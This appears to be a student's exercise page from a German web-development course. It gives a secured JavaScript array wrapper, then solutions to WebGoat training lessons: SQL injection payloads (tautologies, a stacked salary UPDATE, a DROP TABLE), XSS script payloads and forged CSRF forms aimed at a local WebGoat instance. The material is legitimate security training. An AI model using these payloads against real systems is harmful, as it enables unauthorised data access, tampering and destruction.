01 Einführung 02 RWD 03 JavaScript 04 DOM 05 Async 06 SVG 07 Node 08 ModularWeb 09 PWA 10 Vue 11 WebAssembly 12 Security

Übung 12 - Security

12.1 Sicherer Array Wrapper

Ursachenanalyse
Die Set-Funktion des ArrayWrappers sollte eigentlich nur number-Werte für die Position erwarten, jedoch ist dies durch die fehlende Typsicherheit nicht gegeben. Dadurch können auch Funktionen des Array-Prototyps, in dem Fall push(), überschrieben werden. Da push() in der append()-Funktion aufgerufen wird, wird die neue push-Funktion aufgerufen, die den Inhalt des ArrayWrappers in eine eigene Variable schreibt und ausgibt.

Sicherheitskonzept
Beim Aufruf der Set-Funktion muss überprüft werden, ob es sich bei pos um einen number-Wert handelt. Zusätzlich kann sichergestellt werden, dass value nicht vom typ function ist. Erst dann soll die eigentliche Funktion ausgeführt werden.

Sicherer ArrayWrapper: 
                                
    function arrayWrapper() {
        let array = [...arguments]; // private
        return {
            get:function(pos){
                return array[pos];
            },
            set:function(pos,value){
                if(typeof pos == "number" && typeof value != "function"){
                    array[pos] = value;
                }
            },
            append:function(value){
                array.push(value);
            }
        }
    }
12.2 WebGoat Injection
2) Retrieve the department of the employee Bob Franco 
SELECT department FROM employees WHERE first_name='Bob'
3) Change the department of Tobi Barnett to 'Sales' 
UPDATE employees SET department = 'Sales' WHERE first_name = 'Tobi' AND last_name = 'Barnett'
4) Modify the schema by adding the column "phone" (varchar(20)) to the table "employees. 
ALTER TABLE employees ADD phone varchar(20)
5) Grant rights to the table grant_rights to user unauthorized_user 
GRANT ALL ON grant_rights TO unauthorized_user
9) String SQL injection: Retrieve all the users from the users table. 
SELECT * FROM user_data WHERE first_name = 'John' AND last_name = 'Smith' OR '1' = '1'
10) Numeric SQL injection: Retrieve all the data from the users table. 
Login_Count: 0
User_Id: 0 OR 1=1
11) Retrieve all employee data from the employees table. 
Employee Name: Smith
TAN: ' OR '1'='1
12) Change your own salary so you are earning the most! 
Employee name: A
Authentication TAN:'; UPDATE employees SET salary=9999 WHERE first_name='John' AND last_name='Smith
13) Delete the access log. 
%'; DROP TABLE access_log;--
12.3 WebGoat XSS

2) Were the cookies the same on each tab?
Yes.

7) Use the alert() or console.log() methods to find out which field is vulnerable
Credit Card Number: <script>alert()</script>

10) What is the route for the test code that stayed in the app during production?
start.mvc#test

11) Use the route you just found and see if you can use the fact that it reflects a parameter from the route without encoding to execute an internal function in WebGoat. The function you want to execute is webgoat.customjs.phoneHome().
http://127.0.0.1:8080/WebGoat/start.mvc#test/%3Cscript%3Ewebgoat.customjs.phoneHome()%3C%2Fscript%3E
Ergebniszahl: -1550996069

12) Quiz:

1. Are trusted websites immune to XSS attacks?
4 - No, because the browser trusts the website if it is acknowledged trusted, then the browser does not know that the script is malicious.

2. When do XSS attacks occur?
3 - The data is included in dynamic content that is sent to a web user without being validated for malicious content.

3. What are Stored XSS attacks?
1 - The script is permanently stored on the server and the victim gets the malicious script when requesting information from the server.

4. What are Reflected XSS attacks?
2 - They reflect the injected script off the web server. That occurs when input sent to the web server is part of the request.

5. Is JavaScript the only way to perform XSS attacks?
4 - No there are many other ways. Like HTML, Flash or any other type of code that the browser executes.

12.4 WebGoat Cross-Site Request Forgeries
3) Basic Get CSRF Exercise:Trigger the form from an external source while logged in. 

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>CSRF</title>
    </head>
    <body>
    <form action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag" method="POST">
        <input type="hidden" name='csrf' value='true'>
        <input type="submit" name="submit">
    </form>
    </body>
    </html>
4) Post a review on someone else’s behalf 

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>CSRF 4</title>
    </head>
    <body>
    <form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form"
    successcallback="" action="http://127.0.0.1:8080/WebGoat/csrf/review">
    <input class="form-control" id="reviewText" name="reviewText" value="lol" type="text">
    <input type="hidden" class="form-control" id="reviewStars" name="stars" value="0">
    <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
    <input type="submit" name="submit" value="Submit review">
    </form>
    </body>
    </html>
7) CSRF and content-type. POST JSON message to our endpoints... 

    <html>
    <body>
    <form action=http://127.0.0.1:8080/WebGoat/csrf/feedback/message method=post enctype="text/plain">
        <input name=' {"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignore_me":" '
               value='test"}' type='hidden'>
        <input type='submit' value='Submit'>
    </form>
    </body>
    </html>